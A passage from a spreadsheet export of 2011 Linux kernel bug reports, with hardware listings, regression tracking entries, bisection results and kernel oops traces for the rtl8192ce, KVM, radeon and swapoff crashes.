QPI Routing and Protocol Registers (rev 11) 00:16.0 Communication controller: Intel Corporation 5 Series/3400 Series Chipset HECI Controller (rev 06) 00:16.3 Serial controller: Intel Corporation 5 Series/3400 Series Chipset KT Controller (rev 06) 00:19.0 Ethernet controller: Intel Corporation 82577LM Gigabit Network Connection (rev 06) 00:1a.0 USB Controller: Intel Corporation 5 Series/3400 Series Chipset USB2 Enhanced Host Controller (rev 06) 00:1b.0 Audio device: Intel Corporation 5 Series/3400 Series Chipset High Definition Audio (rev 06) 00:1c.0 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 1 (rev 06) 00:1c.1 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 2 (rev 06) 00:1c.3 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 4 (rev 06) 00:1c.4 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 5 (rev 06) 00:1c.6 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 7 (rev 06) 00:1c.7 PCI bridge: Intel Corporation 5 Series/3400 Series Chipset PCI Express Root Port 8 (rev 06) 00:1d.0 USB Controller: Intel Corporation 5 Series/3400 Series Chipset USB2 Enhanced Host Controller (rev 06) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev a6) 00:1f.0 ISA bridge: Intel Corporation Mobile 5 Series Chipset LPC Interface Controller (rev 06) 00:1f.2 SATA controller: Intel Corporation 5 Series/3400 Series Chipset 6 port SATA AHCI Controller (rev 06) 00:1f.3 SMBus: Intel Corporation 5 Series/3400 Series Chipset SMBus Controller (rev 06) 01:00.0 VGA compatible controller: nVidia Corporation Device 0a3c (rev a2) 01:00.1 Audio device: nVidia Corporation High Definition Audio Controller (rev a1) 03:00.0 Network controller: Intel Corporation WiFi Link 6000 Series (rev 35) 0d:00.0 SD Host controller: Ricoh Co Ltd Device e822 (rev 01) 0d:00.1 System peripheral: Ricoh Co Ltd Device e230 (rev 01) 0f:00.0 USB Controller: NEC Corporation Device 0194 (rev 03) 17:00.0 SD Host controller: Ricoh Co Ltd Device e822 (rev 01) 17:00.3 FireWire (IEEE 1394): Ricoh Co Ltd Device e832 (rev 01) ff:00.0 Host bridge: Intel Corporation Core Processor QuickPath Architecture Generic Non-Core Registers (rev 04) ff:00.1 Host bridge: Intel Corporation Core Processor QuickPath Architecture System Address Decoder (rev 04) ff:02.0 Host bridge: Intel Corporation Core Processor QPI Link 0 (rev 04) ff:02.1 Host bridge: Intel Corporation Core Processor QPI Physical 0 (rev 04) ff:03.0 Host bridge: Intel Corporation Core Processor Integrated Memory Controller (rev 04) ff:03.1 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Target Address Decoder (rev 04) ff:03.4 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Test Registers (rev 04) ff:04.0 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 0 Control Registers (rev 04) ff:04.1 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 0 Address Registers (rev 04) ff:04.2 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 0 Rank Registers (rev 04) ff:04.3 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 0 Thermal Control Registers (rev 04) ff:05.0 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 1 Control Registers (rev 04) ff:05.1 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 1 Address Registers (rev 04) ff:05.2 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 1 Rank Registers (rev 04) ff:05.3 Host bridge: Intel Corporation Core Processor Integrated Memory Controller Channel 1 Thermal Control Registers (rev 04) emerge --info Portage 2.2.0_alpha33 (default/linux/amd64/10.0/desktop/kde, gcc-4.5.2, glibc-2.13-r2, 2.6.38-gentoo-r3 x86_64) ================================================================= System uname: Linux-2.6.38-gentoo-r3-x86_64-Intel-R-_Core-TM-_i7_CPU_Q_820_@_1.73GHz-with-gentoo-2.0.2 Timestamp of tree: Sat, 14 May 2011 10:30:01 +0000 app-shells/bash: 4.2_p10 dev-java/java-config: 2.1.11-r3 dev-lang/python: 2.7.1-r1 dev-util/cmake: 2.8.4-r1 sys-apps/baselayout: 2.0.2 sys-apps/openrc: 0.8.2-r1 sys-apps/sandbox: 2.5 sys-devel/autoconf: 2.13, 2.68 sys-devel/automake: 1.9.6-r3, 1.10.3, 1.11.1-r1 sys-devel/binutils: 2.21 sys-devel/gcc: 4.5.2 sys-devel/gcc-config: 1.4.1-r1 sys-devel/libtool: 2.4-r1 sys-devel/make: 3.82 sys-kernel/linux-headers: 2.6.38 (virtual/os-headers) sys-libs/glibc: 2.13-r2</t>
  </si>
  <si>
    <t>rtl8192ce broken in 2.6.39-rc1 on HT40 networks</t>
  </si>
  <si>
    <t>2011-05-14 15:11 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 57802 [details] Patch for HT40 problem with rtl8192ce The changes in driver rtl8192ce that were involved in merging driver rtl8192cu introduced some errors that prevent the usage of rtl8192ce on 270 (HT40) Mbps 802.11n networks. There is no problem with 802.11g for 130 Mbps 802.11n networks. A patch is available.</t>
  </si>
  <si>
    <t>2.6.39-rc7 Oopses when booting with kvm -cpu phenom -smp 2</t>
  </si>
  <si>
    <t>2.6.39-rc7</t>
  </si>
  <si>
    <t>2011-05-15 14:05 UTC</t>
  </si>
  <si>
    <t>Booting a 2.6.39-rc7 kernel with KVM like this results in an Oops: kvm -kernel arch/x86/boot/bzImage -smp 2 -cpu phenom Doesn't oops if either: * "-smp 2" is removed * "-cpu phenom" is removed (or -cpu qemu64 is used) * older guest kernel is used (2.6.38 worked) * I boot the kernel on bare metal on a Phenom CPU Bisection tells me 2.6.39-rc1 worked too, and this regression got introduced by: 5bbc097d890409d8eff4e3f1d26f11a9d6b7c07e is the first bad commit commit 5bbc097d890409d8eff4e3f1d26f11a9d6b7c07e Author: Joerg Roedel &lt;joerg.roedel@amd.com&gt; Date: Fri Apr 15 14:47:40 2011 +0200 x86, amd: Disable GartTlbWlkErr when BIOS forgets it This patch disables GartTlbWlk errors on AMD Fam10h CPUs if the BIOS forgets to do is (or is just too old). Letting these errors enabled can cause a sync-flood on the CPU causing a reboot. The AMD BKDG recommends disabling GART TLB Wlk Error completely. This patch is the fix for https://bugzilla.kernel.org/show_bug.cgi?id=33012 on my machine. Signed-off-by: Joerg Roedel &lt;joerg.roedel@amd.com&gt; Link: http://lkml.kernel.org/r/20110415131152.GJ18463@8bytes.org Tested-by: Alexandre Demers &lt;alexandre.f.demers@gmail.com&gt; Cc: &lt;stable@kernel.org&gt; Signed-off-by: H. Peter Anvin &lt;hpa@linux.intel.com&gt; :040000 040000 1d4588e5725523f455d5972189d4c934cc4c68dc 834f7cd8c7435c82240619df705f83030df844fa M arch Here is the oops: [ 0.015863] Initializing cgroup subsys blkio [ 0.016743] general protection fault: 0000 [#1] PREEMPT SMP [ 0.017451] last sysfs file: [ 0.017783] CPU 0 [ 0.017982] Modules linked in: [ 0.018390] [ 0.018562] Pid: 0, comm: swapper Not tainted 2.6.39-rc7-phenom #108 Bochs Bochs [ 0.019377] RIP: 0010:[&lt;ffffffff814f82b0&gt;] [&lt;ffffffff814f82b0&gt;] init_amd+0x397/0x3b7 [ 0.019998] RSP: 0000:ffffffff81a01ee8 EFLAGS: 00010246 [ 0.019998] RAX: 0000000000000001 RBX: 0000000042004200 RCX: 00000000c0010048 [ 0.019998] RDX: 0000000000000021 RSI: ffffffff81aafe00 RDI: ffffffff8160229c [ 0.019998] RBP: ffffffff81a01f18 R08: 0000000000000023 R09: 0000000000000000 [ 0.019998] R10: 0000000000000001 R11: 0000000000000070 R12: ffffffff81aafe00 [ 0.019998] R13: ffff880007ffb8c0 R14: ffffffffffffffff R15: 0000000000000000 [ 0.019998] FS: 0000000000000000(0000) GS:ffff880007c00000(0000) knlGS:0000000000000000 [ 0.019998] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 0.019998] CR2: 0000000000000000 CR3: 0000000001a23000 CR4: 00000000000006b0 [ 0.019998] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [ 0.019998] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 [ 0.019998] Process swapper (pid: 0, threadinfo ffffffff81a00000, task ffffffff81a2b020) [ 0.019998] Stack: [ 0.019998] 0000001000000001 0000000000000000 ffffffff81a01f18 ffffffff814f7411 [ 0.019998] 0000000000726f73 ffffffff81aafe00 ffffffff81a01f38 ffffffff814f7617 [ 0.019998] ffffffff81afd5a0 ffffffff81b01980 ffffffff81a01f48 ffffffff81ad0615 [ 0.019998] Call Trace: [ 0.019998] [&lt;ffffffff814f7411&gt;] ? get_cpu_cap+0xb2/0xb6 [ 0.019998] [&lt;ffffffff814f7617&gt;] identify_cpu+0x202/0x2f4 [ 0.019998] [&lt;ffffffff81ad0615&gt;] identify_boot_cpu+0x10/0x30 [ 0.019998] [&lt;ffffffff81ad081b&gt;] check_bugs+0x9/0x2d [ 0.019998] [&lt;ffffffff81ac9b50&gt;] start_kernel+0x353/0x36a [ 0.019998] [&lt;ffffffff81ac9322&gt;] x86_64_start_reservations+0x132/0x136 [ 0.019998] [&lt;ffffffff81ac9416&gt;] x86_64_start_kernel+0xf0/0xf7 [ 0.019998] Code: ff 41 80 3c 24 0e 76 17 48 c7 c7 90 22 60 81 e8 27 85 b1 ff 84 c0 75 07 f0 41 80 4c 24 30 02 41 80 3c 24 10 75 1c b9 48 00 01 c0 &lt;0f&gt; 32 89 c0 48 c1 e2 20 80 cc 04 48 09 d0 48 89 c2 48 c1 ea 20 [ 0.019998] RIP [&lt;ffffffff814f82b0&gt;] init_amd+0x397/0x3b7 [ 0.019998] RSP &lt;ffffffff81a01ee8&gt; [ 0.020004] ---[ end trace 4eaa2a86a8e2da22 ]--- [ 0.020491] Kernel panic - not syncing: Attempted to kill the idle task! [ 0.021211] Pid: 0, comm: swapper Tainted: G D 2.6.39-rc7-phenom #108 [ 0.023334] Call Trace: [ 0.023648] [&lt;ffffffff81500988&gt;] panic+0x9b/0x1a2 [ 0.024220] [&lt;ffffffff8104bd8e&gt;] do_exit+0x75e/0x890 [ 0.024773] [&lt;ffffffff810498d4&gt;] ? kmsg_dump+0xc4/0x100 [ 0.025348] [&lt;ffffffff81005fdc&gt;] oops_end+0x9c/0xe0 [ 0.025856] [&lt;ffffffff81006173&gt;] die+0x53/0x80 [ 0.026363] [&lt;ffffffff81003384&gt;] do_general_protection+0x154/0x160 [ 0.026670] [&lt;ffffffff8150a7df&gt;] general_protection+0x1f/0x30 [ 0.027342] [&lt;ffffffff814f82b0&gt;] ? init_amd+0x397/0x3b7 [ 0.027863] [&lt;ffffffff814f8299&gt;] ? init_amd+0x380/0x3b7 [ 0.028324] [&lt;ffffffff814f7411&gt;] ? get_cpu_cap+0xb2/0xb6 [ 0.028792] [&lt;ffffffff814f7617&gt;] identify_cpu+0x202/0x2f4 [ 0.029268] [&lt;ffffffff81ad0615&gt;] identify_boot_cpu+0x10/0x30 [ 0.030002] [&lt;ffffffff81ad081b&gt;] check_bugs+0x9/0x2d [ 0.030513] [&lt;ffffffff81ac9b50&gt;] start_kernel+0x353/0x36a [ 0.031055] [&lt;ffffffff81ac9322&gt;] x86_64_start_reservations+0x132/0x136 [ 0.031626] [&lt;ffffffff81ac9416&gt;] x86_64_start_kernel+0xf0/0xf7 KVM version is: QEMU emulator version 0.14.0 (qemu-kvm-0.14.0 Debian 0.14.0+dfsg-1~tls), Copyright (c) 2003-2008 Fabrice Bellard Host kernel is: Linux debian 2.6.39-rc7-phenom #69 SMP PREEMPT Thu May 12 20:07:27 EEST 2011 x86_64 GNU/Linux Host CPU is: processor : 5 vendor_id : AuthenticAMD cpu family : 16 model : 10 model name : AMD Phenom(tm) II X6 1090T Processor stepping : 0 cpu MHz : 3200.000 cache size : 512 KB physical id : 0 siblings : 6 core id : 5 cpu cores : 6 apicid : 5 initial apicid : 5 fpu : yes fpu_exception : yes cpuid level : 6 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc extd_apicid aperfmperf pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt cpb npt lbrv svm_lock nrip_save pausefilter bogomips : 6431.10 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical, 48 bits virtual power management: ts ttp tm stc 100mhzsteps hwpstate [9]</t>
  </si>
  <si>
    <t>[2.6.39 regression] X locks up hard right after logging in</t>
  </si>
  <si>
    <t>2011-05-15 17:28 UTC</t>
  </si>
  <si>
    <t>2011-05-16 18:53 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.39 regression] X locks up hard right after logging in Submitter : Andrew Lutomirski &lt;luto@mit.edu&gt; Date : 2011-05-12 13:31 Message-ID : BANLkTinWePJ9N8D=JSezOfiQ94qp2bDGrw@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130520713923136&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kernel BUG when syncing ext2 if USB stick is removed</t>
  </si>
  <si>
    <t>2.6.38.6</t>
  </si>
  <si>
    <t>2011-05-15 17:36 UTC</t>
  </si>
  <si>
    <t>2011-06-07 12:49 UTC</t>
  </si>
  <si>
    <t>fs_ext2@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Subject : Kernel BUG when syncing ext2 if USB stick is removed Submitter : Torsten Hilbrich &lt;torsten.hilbrich@secunet.com&gt; Date : 2011-05-12 14:54 Message-ID : 4DCBF4B0.10607@secunet.com References : http://marc.info/?l=linux-kernel&amp;m=130521215329005&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>BUG() in radeon driver with ATI Technologies Inc RV515 [Radeon X1300]</t>
  </si>
  <si>
    <t>2.6.37 and 2.6.38</t>
  </si>
  <si>
    <t>2011-05-16 00:02 UTC</t>
  </si>
  <si>
    <t>Anthony Basile</t>
  </si>
  <si>
    <t>2012-06-13 15:06 UTC</t>
  </si>
  <si>
    <t>A regression in kernels 2.6.37 up to 2.6.38.6 hits a BUG() in the radeon driver with the following hardware (as reported by lspci -kv) 02:00.0 VGA compatible controller: ATI Technologies Inc RV515 [Radeon X1300] (prog-if 00 [VGA controller]) Subsystem: ATI Technologies Inc All-in-Wonder 2006 PCI-E Edition Flags: bus master, fast devsel, latency 0, IRQ 40 Memory at e0000000 (64-bit, prefetchable) [size=256M] Memory at fd9f0000 (64-bit, non-prefetchable) [size=64K] I/O ports at ce00 [size=256] Expansion ROM at fd9c0000 [disabled] [size=128K] Capabilities: [50] Power Management version 2 Capabilities: [58] Express Endpoint, MSI 00 Capabilities: [80] MSI: Enable+ Count=1/1 Maskable- 64bit+ Kernel driver in use: radeon The BUG() is kernel tried to execute NX-protected page - exploit attempt? (uid: 0) BUG: unable to handle kernel paging request at ffffffff81c0e711 IP: [&lt;ffffffff81c0e711&gt;] platform_device_register_resndata+0x0/0x8c PGD 1ae5067 PUD 1ae9063 PMD 3c473063 PTE 8000000001c0e163 Oops: 0011 [#1] SMP last sysfs file: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map CPU 0 Pid: 1627, comm: X Tainted: G W 2.6.38.6 #1 HP Pavilion 061 ER900AA-ABA a1430n/NAGAMI RIP: 0010:[&lt;ffffffff81c0e711&gt;] [&lt;ffffffff81c0e711&gt;] platform_device_register_resndata+0x0/0x8c RSP: 0018:ffff88003a2b3d30 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff88003cb81000 RCX: 0000000000000000 RDX: 0000000000000000 RSI: ffffffff81a41cbb RDI: 0000000000000000 RBP: ffff88003a2b3d88 R08: 0000000000000000 R09: 0000000000000000 R10: ffff88003a340000 R11: 00000000effff000 R12: 0000000000000000 R13: ffff88003cb80800 R14: ffff88003abeaa80 R15: 0000000000000001 FS: 00007f40b4c72880(0000) GS:ffff88003fc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffffff81c0e711 CR3: 000000003a2a8000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process X (pid: 1627, threadinfo ffff88003a2b2000, task ffff88003d3ef1a0) Stack: ffffffff8133aa29 0000000000000000 0000000000000001 ffff88003a2b3de8 ffffffff811681fc ffff88003a2b3df8 ffff88003abeaa80 ffff88003cb80800 0000000000000040 0000000040786440 0000000000000078 ffff88003a2b3ea8 Call Trace: [&lt;ffffffff8133aa29&gt;] ? radeon_cp_init+0xd79/0x1180 [&lt;ffffffff811681fc&gt;] ? ext4_file_write+0x6c/0x2a0 [&lt;ffffffff81317439&gt;] drm_ioctl+0x389/0x4d0 [&lt;ffffffff81339cb0&gt;] ? radeon_cp_init+0x0/0x1180 [&lt;ffffffff8110ddfb&gt;] do_vfs_ioctl+0x9b/0x510 [&lt;ffffffff8110e2bf&gt;] sys_ioctl+0x4f/0x80 [&lt;ffffffff81002e2b&gt;] system_call_fastpath+0x16/0x1b Code: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;00&gt; 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 RIP [&lt;ffffffff81c0e711&gt;] platform_device_register_resndata+0x0/0x8c RSP &lt;ffff88003a2b3d30&gt; CR2: ffffffff81c0e711 ---[ end trace f569524e57c84b79 ]--- More detail is avaiable in the following gentoo bug: http://bugs.gentoo.org/show_bug.cgi?id=359281 We're looking into doing the git-bisect now.</t>
  </si>
  <si>
    <t>Toshiba C670D-10C restarts instead of poweroff when on AC</t>
  </si>
  <si>
    <t>3.4-rc3 3.5.3 3.6.0-rc5</t>
  </si>
  <si>
    <t>2011-05-17 15:42 UTC</t>
  </si>
  <si>
    <t>2013-02-08 18:29 UTC</t>
  </si>
  <si>
    <t>Created attachment 58292 [details] DSDT of Toshiba C670D-10C Toshiba C670D-10C restarts instead of powering off when on AC. It shuts down correctly when on battery. I tried booting with: acpi_osi="Linux" acpi=copy_dsdt (even though it should be the default on all Toshiba hardware now) acpi_os_name="Windows 2009" acpi_os_name="Windows 2001" Works under Windows 7, and in LILO/grub. No BIOS update available from vendor ATM. Attaching DSDT.</t>
  </si>
  <si>
    <t>2.6.38.6 -stable regression: kernel insta-death on boot.</t>
  </si>
  <si>
    <t>2011-05-17 18:48 UTC</t>
  </si>
  <si>
    <t>2011-06-12 20:43 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.38.6 -stable regression: kernel insta-death on boot. Submitter : Nick Bowler &lt;nbowler@elliptictech.com&gt; Date : 2011-05-14 19:57 Message-ID : 20110514195741.GA10757@elliptictech.com References : http://marc.info/?l=linux-kernel&amp;m=130541471818831&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline. Caused by: commit 15f0758f185241ad9c358a5bf60ff0a21eccc218 Author: Boris Ostrovsky &lt;ostr@amd64.org&gt; Date: Fri Apr 29 17:47:43 2011 -0400 x86, AMD: Fix APIC timer erratum 400 affecting K8 Rev.A-E processors Reported-by: Joerg-Volker Peetz &lt;jvpeetz@web.de&gt; Tested-by: Joerg-Volker Peetz &lt;jvpeetz@web.de&gt; Acked-by: Borislav Petkov &lt;borislav.petkov@amd.com&gt; Signed-off-by: Boris Ostrovsky &lt;Boris.Ostrovsky@amd.com&gt; Link: http://lkml.kernel.org/r/1304113663-6586-1-git-send-email-ostr@amd64.org Signed-off-by: Ingo Molnar &lt;mingo@elte.hu&gt; Signed-off-by: Greg Kroah-Hartman &lt;gregkh@suse.de&gt; First-Bad-Commit : 15f0758f185241ad9c358a5bf60ff0a21eccc218</t>
  </si>
  <si>
    <t>BUG() in 2.6.38.6</t>
  </si>
  <si>
    <t>2011-05-17 19:06 UTC</t>
  </si>
  <si>
    <t>2011-06-12 20:55 UTC</t>
  </si>
  <si>
    <t>Subject : BUG() in 2.6.38.6 Submitter : Fabio Coatti &lt;fabio.coatti@gmail.com&gt; Date : 2011-05-15 14:32 Message-ID : BANLkTimboHpcbpKAeGzTEL1j+78vX3RFiA@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=130546997219987&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>early kernel crash when kmemleak is enabled</t>
  </si>
  <si>
    <t>2011-05-17 19:10 UTC</t>
  </si>
  <si>
    <t>2011-06-06 21:12 UTC</t>
  </si>
  <si>
    <t>Subject : early kernel crash when kmemleak is enabled Submitter : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Date : 2011-05-15 10:55 Message-ID : 20110515105505.GA21631@joi.lan References : http://marc.info/?l=linux-kernel&amp;m=130545705511118&amp;w=2 This entry is being used for tracking a regression from 2.6.38. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at arch/x86/mm/highmem_32.c:81 __kunmap_atomic, when doing swapoff</t>
  </si>
  <si>
    <t>2.6.39-rc7-00897-ga2b9c1f</t>
  </si>
  <si>
    <t>2011-05-19 01:24 UTC</t>
  </si>
  <si>
    <t>2011-05-30 08:42 UTC</t>
  </si>
  <si>
    <t>Hugh Dickins</t>
  </si>
  <si>
    <t># modprobe zram # echo $((256*1024*1024)) &gt; /sys/block/zram0/disksize # mkswap /dev/zram0 # swapon -p 10 /dev/zram0 [ 2386.525073] Adding 262140k swap on /dev/zram0. Priority:10 extents:1 across:262140k SS Ok, so now I have empty /dev/zram0, but my other swap device have some pages. With still plenty of free RAM, and lots of cached memory, it should be safe to disable this other device. So # swapoff /dev/dm-4 [ 2397.696435] ------------[ cut here ]------------ [ 2397.700674] WARNING: at arch/x86/mm/highmem_32.c:81 __kunmap_atomic+0xdc/0xf0() [ 2397.704769] Hardware name: 2669UYD [ 2397.708876] Modules linked in: vboxnetadp vboxnetflt ebtable_nat ebtables acpi_cpufreq mperf uinput blowfish xcbc rmd160 nfsd hdaps tp_smapi thinkpad_ec radeonfb fb_ddc radeon ttm drm_kms_helper drm ipw2200 intel_agp intel_gtt i2c_algo_bit libipw i2c_i801 rng_core cfbfillrect agpgart cfbcopyarea cfbimgblt raid10 raid1 raid0 linear md_mod vboxdrv sr_mod cdrom [last unloaded: scsi_wait_scan] [ 2397.722548] Pid: 14922, comm: swapoff Tainted: G W 2.6.39-rc7-thinkpad-t43-00897-ga2b9c1f-dirty #60 [ 2397.727109] Call Trace: [ 2397.731719] [&lt;c1771dcf&gt;] ? printk+0x1d/0x1f [ 2397.736327] [&lt;c1056822&gt;] warn_slowpath_common+0x72/0xa0 [ 2397.740851] [&lt;c103633c&gt;] ? __kunmap_atomic+0xdc/0xf0 [ 2397.745196] [&lt;c103633c&gt;] ? __kunmap_atomic+0xdc/0xf0 [ 2397.749458] [&lt;c1056870&gt;] warn_slowpath_null+0x20/0x30 [ 2397.753775] [&lt;c103633c&gt;] __kunmap_atomic+0xdc/0xf0 [ 2397.758054] [&lt;c110fb3e&gt;] shmem_unuse_inode+0x29e/0x380 [ 2397.762355] [&lt;c110fceb&gt;] shmem_unuse+0xcb/0x120 [ 2397.766641] [&lt;c112c638&gt;] try_to_unuse+0x238/0x4a0 [ 2397.770929] [&lt;c108dcad&gt;] ? put_lock_stats.isra.20+0xd/0x30 [ 2397.775231] [&lt;c108e23b&gt;] ? lock_release_holdtime.part.21+0x6b/0xd0 [ 2397.779596] [&lt;c178e10d&gt;] ? sub_preempt_count.part.170+0x4d/0x90 [ 2397.784086] [&lt;c178e174&gt;] ? sub_preempt_count+0x24/0x50 [ 2397.788557] [&lt;c112d55c&gt;] sys_swapoff+0x16c/0x450 [ 2397.793076] [&lt;c1791a98&gt;] sysenter_do_call+0x12/0x38 [ 2397.797608] ---[ end trace fde09f67fd5225da ]--- [ 2397.802280] BUG: unable to handle kernel paging request at fffb9000 [ 2397.807008] IP: [&lt;c110c191&gt;] shmem_swp_set+0x11/0x30 [ 2397.811785] *pdpt = 0000000001c8c001 *pde = 0000000001c91067 *pte = 0000000000000000 [ 2397.812221] Oops: 0002 [#1] PREEMPT SMP [ 2397.812221] last sysfs file: /sys/devices/virtual/block/dm-4/dm/name [ 2397.812221] Modules linked in: vboxnetadp vboxnetflt ebtable_nat ebtables acpi_cpufreq mperf uinput blowfish xcbc rmd160 nfsd hdaps tp_smapi thinkpad_ec radeonfb fb_ddc radeon ttm drm_kms_helper drm ipw2200 intel_agp intel_gtt i2c_algo_bit libipw i2c_i801 rng_core cfbfillrect agpgart cfbcopyarea cfbimgblt raid10 raid1 raid0 linear md_mod vboxdrv sr_mod cdrom [last unloaded: scsi_wait_scan] [ 2397.812221] [ 2397.812221] Pid: 14922, comm: swapoff Tainted: G W 2.6.39-rc7-thinkpad-t43-00897-ga2b9c1f-dirty #60 IBM 2669UYD/2669UYD [ 2397.812221] EIP: 0060:[&lt;c110c191&gt;] EFLAGS: 00010296 CPU: 0 [ 2397.812221] EIP is at shmem_swp_set+0x11/0x30 [ 2397.812221] EAX: f72d1480 EBX: ffffffff ECX: 00000000 EDX: fffb9000 [ 2397.812221] ESI: fffb9000 EDI: 00000001 EBP: f7257eb4 ESP: f7257eb0 [ 2397.812221] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 2397.812221] Process swapoff (pid: 14922, ti=f7256000 task=f066c420 task.ti=f7256000) [ 2397.812221] Stack: [ 2397.812221] 00000020 f7257ee8 c110fb1d 00000000 00000000 f6eb9300 00000020 fffba000 [ 2397.812221] f72d1670 f72d1480 00000010 f6eb9300 f241653c f6eb9300 f7257f08 c110fceb [ 2397.812221] 00000000 00000000 00000020 00000020 f8fb4020 f73b6cc0 f7257f7c c112c638 [ 2397.812221] Call Trace: [ 2397.812221] [&lt;c110fb1d&gt;] shmem_unuse_inode+0x27d/0x380 [ 2397.812221] [&lt;c110fceb&gt;] shmem_unuse+0xcb/0x120 [ 2397.812221] [&lt;c112c638&gt;] try_to_unuse+0x238/0x4a0 [ 2397.812221] [&lt;c108dcad&gt;] ? put_lock_stats.isra.20+0xd/0x30 [ 2397.812221] [&lt;c108e23b&gt;] ? lock_release_holdtime.part.21+0x6b/0xd0 [ 2397.812221] [&lt;c178e10d&gt;] ? sub_preempt_count.part.170+0x4d/0x90 [ 2397.812221] [&lt;c178e174&gt;] ? sub_preempt_count+0x24/0x50 [ 2397.812221] [&lt;c112d55c&gt;] sys_swapoff+0x16c/0x450 [ 2397.812221] [&lt;c1791a98&gt;] sysenter_do_call+0x12/0x38 [ 2397.812221] Code: fc 89 ec 5d c3 90 8d 74 26 00 3b b0 e4 00 00 00 76 ce eb b4 8d b6 00 00 00 00 55 89 e5 53 3e 8d 74 26 00 83 f9 01 19 db 83 cb 01 [ 2397.812221] 0a 89 d1 01 58 30 83 c0 3c 29 c1 83 f9 3f 76 0a 89 d0 e8 27 [ 2397.812221] EIP: [&lt;c110c191&gt;] shmem_swp_set+0x11/0x30 SS:ESP 0068:f7257eb0 [ 2397.812221] CR2: 00000000fffb9000 [ 2397.812221] ---[ end trace fde09f67fd5225db ]--- [ 2397.812221] note: swapoff[14922] exited with preempt_count 2 [ 2398.021379] BUG: sleeping function called from invalid context at kernel/rwsem.c:21 [ 2398.027799] in_atomic(): 1, irqs_disabled(): 0, pid: 14922, name: swapoff [ 2398.034281] INFO: lockdep is turned off. [ 2398.040764] Pid: 14922, comm: swapoff Tainted: G D W 2.6.39-rc7-thinkpad-t43-00897-ga2b9c1f-dirty #60 [ 2398.047421] Call Trace: [ 2398.054019] [&lt;c103ea52&gt;] __might_sleep.part.159+0xb2/0xd0 [ 2398.060657] [&lt;c103ead2&gt;] __might_sleep+0x62/0x90 [ 2398.067145] [&lt;c17895e0&gt;] down_read+0x20/0x85 [ 2398.073483] [&lt;c1773de5&gt;] ? audit_free_context+0xa8/0xcd [ 2398.079635] [&lt;c105ae80&gt;] exit_mm+0x30/0x120 [ 2398.085613] [&lt;c105b09b&gt;] do_exit+0x12b/0x440 [ 2398.091483] [&lt;c178c034&gt;] oops_end+0x94/0xd0 [ 2398.097239] [&lt;c1771236&gt;] no_context+0xc3/0xcb [ 2398.103022] [&lt;c1771366&gt;] __bad_area_nosemaphore+0x128/0x130 [ 2398.108822] [&lt;c10803df&gt;] ? sched_clock_local+0xcf/0x1d0 [ 2398.114646] [&lt;c1770c97&gt;] ? pte_offset_kernel+0x1e/0x2d [ 2398.120500] [&lt;c178da57&gt;] ? spurious_fault+0x87/0xe0 [ 2398.126317] [&lt;c178dabe&gt;] ? vmalloc_fault+0xe/0x190 [ 2398.132172] [&lt;c1771385&gt;] bad_area_nosemaphore+0x17/0x19 [ 2398.138005] [&lt;c178defc&gt;] do_page_fault+0x2bc/0x480 [ 2398.143882] [&lt;c1080725&gt;] ? local_clock+0x65/0x70 [ 2398.149709] [&lt;c178e174&gt;] ? sub_preempt_count+0x24/0x50 [ 2398.155566] [&lt;c108dcc2&gt;] ? put_lock_stats.isra.20+0x22/0x30 [ 2398.161423] [&lt;c178b53f&gt;] ? error_code+0x5b/0x64 [ 